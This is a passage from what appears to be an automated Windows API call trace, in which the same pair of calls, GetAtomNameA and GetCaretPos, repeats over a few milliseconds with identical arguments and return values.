[0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.126] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.126] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.127] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.127] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.128] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.128] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.129] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.129] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.130] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.130] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.131] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.131] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.132] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.132] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0201.133] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0201.133] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 